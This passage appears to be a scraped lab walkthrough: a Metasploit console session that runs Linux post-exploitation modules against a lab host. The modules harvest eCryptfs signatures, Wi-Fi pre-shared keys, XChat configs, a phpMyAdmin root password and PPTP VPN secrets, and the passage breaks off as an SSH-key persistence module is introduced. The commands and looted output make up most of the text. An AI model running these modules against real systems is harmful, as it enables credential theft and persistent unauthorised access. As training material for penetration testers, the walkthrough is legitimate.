192.198.6.3 ecryptfs.sig-cache.txt text/plain eCryptfs sig-cache.txt File /root/.msf4/loot/20230324143535_default_192
.198.6.3_ecryptfs.sigcac_464389.txt
msf5 post(linux/gather/ecryptfs_creds) > cat /root/.msf4/loot/20230324143535_default_192.198.6.3_ecryptfs.sigcac_464389.txt
[*] exec: cat /root/.msf4/loot/20230324143535_default_192.198.6.3_ecryptfs.sigcac_464389.txt
3b32b64d6121597a
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
msf5 post(linux/gather/ecryptfs_creds) > use post/linux/gather/enum_psk
msf5 post(linux/gather/enum_psk) > info
Name: Linux Gather 802-11-Wireless-Security Credentials
Module: post/linux/gather/enum_psk
Platform: Linux
Arch:
Rank: Normal
Provided by:
Cenk Kalpakoglu
Compatible session types:
Meterpreter
Shell
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
DIR /etc/NetworkManager/system-connections/ yes The default path for network connections
SESSION yes The session to run this module on.
Description:
This module collects 802-11-Wireless-Security credentials such as
Access-Point name and Pre-Shared-Key from your target CLIENT Linux
machine using /etc/NetworkManager/system-connections/ files. The
module gathers NetworkManager's plaintext "psk" information.
msf5 post(linux/gather/enum_psk) > set SESSION 2
SESSION => 2
msf5 post(linux/gather/enum_psk) > exploit
[*] Reading file /etc/NetworkManager/system-connections/TopSecret_Network
[*] Reading file /etc/NetworkManager/system-connections/Wi-Fi connection 1
[*] Reading file /etc/NetworkManager/system-connections/Wi-Fi connection 2
802-11-wireless-security
========================
AccessPoint-Name PSK
---------------- ---
Wi-Fi connection 1 AttackDefence_WiFi_123321
Wi-Fi connection 2 Free_Internet
[+] Secrets stored in: /root/.msf4/loot/20230324144135_default_192.198.6.3_linux.psk.creds_605438.txt
[*] Done
[*] Post module execution completed
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
msf5 post(linux/gather/enum_psk) > loot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
192.198.6.3 linux.psk.creds wireless_credentials.txt text/csv /root/.msf4/loot/20230324144135_default_
192.198.6.3_linux.psk.creds_605438.txt
msf5 post(linux/gather/enum_psk) > cat /root/.msf4/loot/20230324144135_default_192.198.6.3_linux.psk.creds_605438.txt
[*] exec: cat /root/.msf4/loot/20230324144135_default_192.198.6.3_linux.psk.creds_605438.txt
AccessPoint-Name,PSK
"Wi-Fi connection 1","AttackDefence_WiFi_123321"
"Wi-Fi connection 2","Free_Internet"
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
msf5 post(linux/gather/enum_psk) > use post/linux/gather/enum_xchat
msf5 post(linux/gather/enum_xchat) > info
Name: Linux Gather XChat Enumeration
Module: post/linux/gather/enum_xchat
Platform: Linux
Arch:
Rank: Normal
Provided by:
sinn3r <sinn3r@metasploit.com>
Compatible session types:
Meterpreter
Shell
Available actions:
Name Description
---- -----------
ALL Collect both the plists and chat logs
CHATS Collect chat logs with a pattern
CONFIGS Collect XCHAT's config files
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Description:
This module will collect XChat's config files and chat logs from the
victim's machine. There are three actions you may choose: CONFIGS,
CHATS, and ALL. The CONFIGS option can be used to collect
information such as channel settings, channel/server passwords, etc.
The CHATS option will simply download all the .log files.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
msf5 post(linux/gather/enum_xchat) > set SESSION 2
SESSION => 2
msf5 post(linux/gather/enum_xchat) > exploit
[+] 192.198.6.3:55958 - servlist_.conf saved as /root/.msf4/loot/20230324144821_default_192.198.6.3_xchat.config_717304.txt
[+] 192.198.6.3:55958 - xchat.conf saved as /root/.msf4/loot/20230324144821_default_192.198.6.3_xchat.config_128075.txt
[*] Post module execution completed
msf5 post(linux/gather/enum_xchat) > loot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
192.198.6.3 xchat.config servlist_.conf text/plain /root/.msf4/loot/20230324144821_default_
192.198.6.3_xchat.config_717304.txt
192.198.6.3 xchat.config xchat.conf text/plain /root/.msf4/loot/20230324144821_default_
192.198.6.3_xchat.config_128075.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
msf5 post(linux/gather/enum_xchat) > cat /root/.msf4/loot/20230324144821_default_192.198.6.3_xchat.config_717304.txt
[*] exec: cat /root/.msf4/loot/20230324144821_default_192.198.6.3_xchat.config_717304.txt
v=2.8.8
N=irc.oftc.net
J=#llvm
E=IRC (Latin/Unicode Hybrid)
F=27
D=0
S=irc.oftc.net/6667
N=Debian Servers
J=#debian
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.debian.org
N=Ubuntu Servers
J=#ubuntu
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.ubuntu.com/8001
N=2600net
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.2600.net
N=7-indonesia
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.7-indonesia.org
N=AccessIRC
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.accessirc.net
S=eu.accessirc.net
N=AfterNET
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.afternet.org
S=us.afternet.org
S=eu.afternet.org
N=Aitvaras
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.data.lt/+6668
S=irc-ssl.omnitel.net/+6668
S=irc-ssl.le.lt/+9999
S=irc.data.lt
S=irc.omnitel.net
S=irc.ktu.lt
S=irc.le.lt
S=irc.takas.lt
S=irc.5ci.net
S=irc.kis.lt
N=AmigaNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.amiganet.org
S=us.amiganet.org
S=uk.amiganet.org
N=ARCNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=se1.arcnet.vapor.com
S=us1.arcnet.vapor.com
S=us2.arcnet.vapor.com
S=us3.arcnet.vapor.com
S=ca1.arcnet.vapor.com
S=de1.arcnet.vapor.com
S=de3.arcnet.vapor.com
S=ch1.arcnet.vapor.com
S=be1.arcnet.vapor.com
S=nl3.arcnet.vapor.com
S=uk1.arcnet.vapor.com
S=uk2.arcnet.vapor.com
S=fr1.arcnet.vapor.com
N=AstroLink
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.astrolink.org
N=AustNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=au.austnet.org
S=us.austnet.org
S=ca.austnet.org
N=AzzurraNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.azzurra.org
S=crypto.azzurra.org
N=Beirut
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.beirut.com
N=ChattingAway
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.chattingaway.com
N=ChatJunkies
J=#xchat
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.chatjunkies.org
S=nl.chatjunkies.org
N=ChatNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=US.ChatNet.Org
S=EU.ChatNet.Org
N=ChatSociety
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=us.chatsociety.net
S=eu.chatsociety.net
N=ChatSpike
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.chatspike.net
N=ChillFactory
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.chillfactory.net
N=CoolChat
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.coolchat.net
N=Criten
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.criten.net
S=irc.eu.criten.net
N=DALnet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.dal.net
S=irc.eu.dal.net
N=Dark-Tou-Net
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.d-t-net.de
S=bw.d-t-net.de
S=nc.d-t-net.de
S=wakka.d-t-net.de
N=DarkMyst
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.darkmyst.org
N=DeepIRC
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.deepirc.net
N=DeltaAnime
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.deltaanime.net
N=EFnet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.blackened.com
S=irc.Prison.NET
S=irc.Qeast.net
S=irc.efnet.pl
S=efnet.demon.co.uk
S=irc.lightning.net
S=irc.mindspring.com
S=irc.easynews.com
S=irc.servercentral.net
N=EnterTheGame
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=IRC.EnterTheGame.Com
N=EUIrc
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.euirc.net
S=irc.ham.de.euirc.net
S=irc.ber.de.euirc.net
S=irc.ffm.de.euirc.net
S=irc.bre.de.euirc.net
S=irc.hes.de.euirc.net
S=irc.vie.at.euirc.net
S=irc.inn.at.euirc.net
S=irc.bas.ch.euirc.net
N=EuropNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.europnet.org
N=EU-IRC
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.eu-irc.net
N=FDFNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.fdfnet.net
S=irc.eu.fdfnet.net
N=FEFNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.fef.net
S=irc.ggn.net
S=irc.vendetta.com
N=FreeNode
J=#vim,#python,#bash
E=IRC (Latin/Unicode Hybrid)
F=27
D=0
S=irc.freenode.net/8001
N=GalaxyNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.galaxynet.org
N=GamesNET
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.gamesnet.net
S=irc.ca.gamesnet.net
S=irc.eu.gamesnet.net
N=GeekShed
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.geekshed.net
N=German-Elite
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=dominion.german-elite.net
S=komatu.german-elite.net
N=GimpNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.gimp.org
S=irc.us.gimp.org
N=HabberNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.habber.net
N=Hashmark
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.hashmark.net
N=IdleMonkeys
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.idlemonkeys.net
N=iZ-smart.net
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.iZ-smart.net/6666
S=irc.iZ-smart.net/6667
S=irc.iZ-smart.net/6668
N=IrcLink
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.irclink.net
S=Alesund.no.eu.irclink.net
S=Oslo.no.eu.irclink.net
S=frogn.no.eu.irclink.net
S=tonsberg.no.eu.irclink.net
N=IRCNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.ircnet.com
S=irc.stealth.net/6668
S=ircnet.demon.co.uk
S=irc.datacomm.ch
S=random.ircd.de
S=ircnet.netvision.net.il
S=irc.cs.hut.fi
N=Irctoo.net
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.irctoo.net
N=Krstarica
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.krstarica.com
N=Librenet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.librenet.net
S=ielf.fr.librenet.net
N=LinkNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.link-net.org
S=irc.no.link-net.org
S=irc.bahnhof.se
N=MagicStar
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.magicstar.net
N=Majistic
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.majistic.net
N=MindForge
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.mindforge.org
N=MintIRC
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.mintirc.net
N=MIXXnet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.mixxnet.net
N=NeverNET
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.nevernet.net
S=imagine.nevernet.net
S=dimension.nevernet.net
S=universe.nevernet.net
S=wayland.nevernet.net
S=forte.nevernet.net
N=NixHelpNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.nixhelp.org
S=us.nixhelp.org
S=uk.nixhelp.org
S=uk2.nixhelp.org
S=uk3.nixhelp.org
S=nl.nixhelp.org
S=ca.ld.nixhelp.org
S=us.co.nixhelp.org
S=us.ca.nixhelp.org
S=us.pa.nixhelp.org
N=NullusNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.nullus.net
N=Oceanius
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.oceanius.com
N=OFTC
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.oftc.net
N=OtherNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.othernet.org
N=OzNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.oz.org
S=germany.oz.org
S=sandiego.oz.org
S=us.oz.org
S=au.oz.org
S=rockhampton.oz.org
S=wollongong.oz.org
S=waix.oz.org
N=PTlink
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.PTlink.net
S=aaia.PTlink.net
N=PTNet, ISP's
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.PTNet.org
S=rccn.PTnet.org
S=EUnet.PTnet.org
S=madinfo.PTnet.org
S=netc2.PTnet.org
S=netc1.PTnet.org
S=telepac1.ptnet.org
S=esoterica.PTnet.org
S=ip-hub.ptnet.org
S=telepac1.ptnet.org
S=nortenet.PTnet.org
N=PTNet, UNI
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.PTNet.org
S=rccn.PTnet.org
S=uevora.PTnet.org
S=umoderna.PTnet.org
S=ist.PTnet.org
S=aaum.PTnet.org
S=uc.PTnet.org
S=ualg.ptnet.org
S=madinfo.PTnet.org
S=ua.PTnet.org
S=ipg.PTnet.org
S=isec.PTnet.org
S=utad.PTnet.org
S=iscte.PTnet.org
S=ubi.PTnet.org
N=QuakeNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.quakenet.org
S=irc.se.quakenet.org
S=irc.dk.quakenet.org
S=irc.no.quakenet.org
S=irc.fi.quakenet.org
S=irc.be.quakenet.org
S=irc.uk.quakenet.org
S=irc.de.quakenet.org
S=irc.it.quakenet.org
N=RebelChat
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.rebelchat.org
N=RizeNET
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.rizenet.org
S=omega.rizenet.org
S=evelance.rizenet.org
S=lisa.rizenet.org
S=scott.rizenet.org
N=Rizon
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.rizon.net
N=RusNet
E=KOI8-R (Cyrillic)
F=19
D=0
S=irc.tomsk.net
S=irc.rinet.ru
S=irc.run.net
S=irc.ru
S=irc.lucky.net
N=SceneNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.scene.org
S=irc.eu.scene.org
S=irc.us.scene.org
N=SeilEn.de
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.seilen.de
N=SlashNET
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.slashnet.org
S=area51.slashnet.org
S=moo.slashnet.org
S=radon.slashnet.org
N=Sohbet.Net
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.sohbet.net
N=SolidIRC
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.solidirc.com
N=SorceryNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.sorcery.net/9000
S=irc.us.sorcery.net/9000
S=irc.eu.sorcery.net/9000
N=Spidernet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=us.spidernet.org
S=eu.spidernet.org
S=irc.spidernet.org
N=StarChat
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.starchat.net
S=gainesville.starchat.net
S=freebsd.starchat.net
S=sunset.starchat.net
S=revenge.starchat.net
S=tahoma.starchat.net
S=neo.starchat.net
N=TNI3
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.tni3.com
N=TURLINet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.turli.net
S=irc.servx.ru
S=irc.gavnos.ru
N=UnderNet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=us.undernet.org
S=eu.undernet.org
N=UniBG
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.lirex.com
S=irc.naturella.com
S=irc.spnet.net
S=irc.techno-link.com
S=irc.telecoms.bg
S=irc.tu-varna.edu
N=Whiffle
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.whiffle.org
N=Worldnet
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.worldnet.net
S=irc.fr.worldnet.net
N=Xentonix.net
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=irc.xentonix.net
N=XWorld
E=IRC (Latin/Unicode Hybrid)
F=19
D=0
S=Buffalo.NY.US.XWorld.org
S=Minneapolis.MN.US.Xworld.Org
S=Rochester.NY.US.XWorld.org
S=Bayern.DE.EU.XWorld.Org
S=Chicago.IL.US.XWorld.Org
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
msf5 post(linux/gather/enum_xchat) > cat /root/.msf4/loot/20230324144821_default_192.198.6.3_xchat.config_128075.txt
[*] exec: cat /root/.msf4/loot/20230324144821_default_192.198.6.3_xchat.config_128075.txt
version = 2.8.8
auto_save = 1
auto_save_url = 0
away_auto_unmark = 0
away_reason = I'm busy
away_show_message = 0
away_show_once = 1
away_size_max = 300
away_timeout = 60
away_track = 1
completion_amount = 5
completion_auto = 0
completion_sort = 0
completion_suffix = :
dcc_auto_chat = 0
dcc_auto_resume = 1
dcc_auto_send = 2
dcc_blocksize = 1024
dcc_completed_dir =
dcc_fast_send = 1
dcc_global_max_get_cps = 0
dcc_global_max_send_cps = 0
dcc_ip =
dcc_ip_from_server = 1
dcc_max_get_cps = 0
dcc_max_send_cps = 0
dcc_permissions = 384
dcc_port_first = 0
dcc_port_last = 0
dcc_remove = 0
dcc_save_nick = 0
dcc_send_fillspaces = 0
dcc_stall_timeout = 60
dcc_timeout = 180
dnsprogram = host
flood_ctcp_num = 5
flood_ctcp_time = 30
flood_msg_num = 5
flood_msg_time = 30
gui_auto_open_chat = 1
gui_auto_open_dialog = 1
gui_auto_open_recv = 1
gui_auto_open_send = 1
gui_dialog_height = 256
gui_dialog_left = 0
gui_dialog_top = 0
gui_dialog_width = 500
gui_hide_menu = 1
gui_input_spell = 1
gui_input_style = 0
gui_join_dialog = 0
gui_lagometer = 1
gui_mode_buttons = 0
gui_pane_left_size = 127
gui_pane_right_size = 100
gui_quit_dialog = 0
gui_slist_select = 28
gui_slist_skip = 1
gui_throttlemeter = 1
gui_topicbar = 0
gui_tray = 0
gui_tray_flags = 0
gui_tweaks = 0
gui_ulist_buttons = 0
gui_ulist_doubleclick = QUOTE WHOIS %s %s
gui_ulist_hide = 1
gui_ulist_left = 0
gui_ulist_pos = 3
gui_ulist_resizable = 1
gui_ulist_show_hosts = 0
gui_ulist_sort = 0
gui_ulist_style = 1
gui_url_mod = 4
gui_usermenu = 0
gui_win_height = 646
gui_win_left = 142
gui_win_save = 1
gui_win_state = 0
gui_win_top = 20
gui_win_width = 995
input_balloon_chans = 0
input_balloon_hilight = 1
input_balloon_priv = 1
input_balloon_time = 20
input_beep_chans = 0
input_beep_hilight = 0
input_beep_msg = 0
input_command_char = /
input_filter_beep = 0
input_flash_chans = 0
input_flash_hilight = 1
input_flash_priv = 1
input_perc_ascii = 0
input_perc_color = 0
input_tray_chans = 0
input_tray_hilight = 1
input_tray_priv = 1
irc_auto_rejoin = 0
irc_ban_type = 2
irc_conf_mode = 0
irc_extra_hilight =
irc_hide_version = 0
irc_id_ntext =
irc_id_ytext =
irc_invisible = 0
irc_join_delay = 3
irc_logging = 0
irc_logmask = %n-%c.log
irc_nick_hilight =
irc_no_hilight = NickServ,ChanServ
irc_part_reason = Leaving
irc_quit_reason = Leaving
irc_raw_modes = 0
irc_servernotice = 0
irc_skip_motd = 0
irc_wallops = 0
irc_who_join = 1
irc_whois_front = 0
net_auto_reconnect = 1
net_auto_reconnectonfail = 0
net_bind_host =
net_ping_timeout = 0
net_proxy_auth = 0
net_proxy_host =
net_proxy_pass =
net_proxy_port = 0
net_proxy_type = 0
net_proxy_use = 0
net_proxy_user =
net_reconnect_delay = 10
net_throttle = 1
notify_timeout = 15
notify_whois_online = 0
perl_warnings = 0
sound_command =
stamp_log = 1
stamp_log_format = %b %d %H:%M:%S
stamp_text = 1
stamp_text_format = 16-%M-0
tab_chans = 1
tab_dialogs = 1
tab_layout = 2
tab_new_to_front = 2
tab_notices = 1
tab_pos = 1
tab_position = 2
tab_server = 1
tab_small = 0
tab_sort = 1
tab_trunc = 20
tab_utils = 0
text_background =
text_color_nicks = 0
text_font = DejaVu Sans Mono 8
text_indent = 1
text_max_indent = 256
text_max_lines = 500
text_replay = 0
text_show_marker = 1
text_show_sep = 1
text_stripcolor = 0
text_thin_sep = 1
text_tint_blue = 220
text_tint_green = 220
text_tint_red = 220
text_transparent = 1
text_wordwrap = 1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
msf5 post(linux/gather/enum_xchat) > use post/linux/gather/phpmyadmin_credsteal
msf5 post(linux/gather/phpmyadmin_credsteal) > info
Name: Phpmyadmin credentials stealer
Module: post/linux/gather/phpmyadmin_credsteal
Platform: Linux
Arch:
Rank: Normal
Provided by:
Chaitanya Haritash [bofheaded]
Dhiraj Mishra <dhiraj@notsosecure.com>
Compatible session types:
Meterpreter
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
Description:
This module gathers Phpmyadmin creds from target linux machine.
msf5 post(linux/gather/phpmyadmin_credsteal) > set SESSION 2
SESSION => 2
msf5 post(linux/gather/phpmyadmin_credsteal) > exploit
PhpMyAdmin Creds Stealer!
[+] PhpMyAdmin config found!
[+] Extracting creds
[+] User: root
[+] Password: N0tE@syT0Guess!!
[*] Storing credentials...
[+] Config file located at /root/.msf4/loot/20230324145715_default_192.198.6.3_phpmyadmin_conf_237256.txt
[*] Post module execution completed
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
msf5 post(linux/gather/phpmyadmin_credsteal) > loot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
192.198.6.3 phpmyadmin_conf phpmyadmin_conf.txt text/plain phpmyadmin_conf /root/.msf4/loot/20230324145715_default_
192.198.6.3_phpmyadmin_conf_237256.txt
msf5 post(linux/gather/phpmyadmin_credsteal) > cat /root/.msf4/loot/20230324145715_default_192.198.6.3_phpmyadmin_conf_237256.txt
[*] exec: cat /root/.msf4/loot/20230324145715_default_192.198.6.3_phpmyadmin_conf_237256.txt
<?php
##
## database access settings in php format
## automatically generated from /etc/dbconfig-common/phpmyadmin.conf
## by /usr/sbin/dbconfig-generate-include
##
## by default this file is managed via ucf, so you shouldn't have to
## worry about manual changes being silently discarded. *however*,
## you'll probably also want to edit the configuration file mentioned
## above too.
##
$dbuser='root';
$dbpass='N0tE@syT0Guess!!';
$basepath='';
$dbname='phpmyadmin';
$dbserver='localhost';
$dbport='';
$dbtype='mysql';
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
msf5 post(linux/gather/phpmyadmin_credsteal) > use post/linux/gather/pptpd_chap_secrets
msf5 post(linux/gather/pptpd_chap_secrets) > info
Name: Linux Gather PPTP VPN chap-secrets Credentials
Module: post/linux/gather/pptpd_chap_secrets
Platform: Linux
Arch:
Rank: Normal
Provided by:
sinn3r <sinn3r@metasploit.com>
Compatible session types:
Meterpreter
Shell
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILE /etc/ppp/chap-secrets yes The default path for chap-secrets
SESSION yes The session to run this module on.
Description:
This module collects PPTP VPN information such as client, server,
password, and IP from your target server's chap-secrets file.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
msf5 post(linux/gather/pptpd_chap_secrets) > set SESSION 2
SESSION => 2
msf5 post(linux/gather/pptpd_chap_secrets) > exploit
PPTPd chap-secrets
==================
Client Server Secret IP
------ ------ ------ --
jackie attackdefense.com HiddenNetwork 10.10.10.10
ninja pentesteracademy.com LearningIsReal 216.146.39.125
peter underground.onion ReallySecure!! 246.234.63.133
[+] Secrets stored in: /root/.msf4/loot/20230324150314_default_192.198.6.3_linux.chapsecret_875395.txt
[*] Post module execution completed
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
msf5 post(linux/gather/pptpd_chap_secrets) > loot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
192.198.6.3 linux.chapsecrets.creds chap-secrets.txt text/csv /root/.msf4/loot/20230324150314_default
_192.198.6.3_linux.chapsecret_875395.txt
msf5 post(linux/gather/pptpd_chap_secrets) > cat /root/.msf4/loot/20230324150314_default_192.198.6.3_linux.chapsecret_875395.txt
[*] exec: cat /root/.msf4/loot/20230324150314_default_192.198.6.3_linux.chapsecret_875395.txt
Client,Server,Secret,IP
"jackie","attackdefense.com","HiddenNetwork","10.10.10.10"
"ninja","pentesteracademy.com","LearningIsReal","216.146.39.125"
"peter","underground.onion","ReallySecure!!","246.234.63.133"
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
msf5 post(linux/gather/pptpd_chap_secrets) > use post/linux/manage/sshkey_persistence
msf5 post(linux/manage/sshkey_persistence) > info
Name: SSH Key Persistence
Module: post/linux/manage/sshkey_persistence
Platform: Linux
Arch:
Rank: Excellent
Provided by:
h00die <mike@shorebreaksecurity.com>
Compatible session types:
Meterpreter
Shell
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
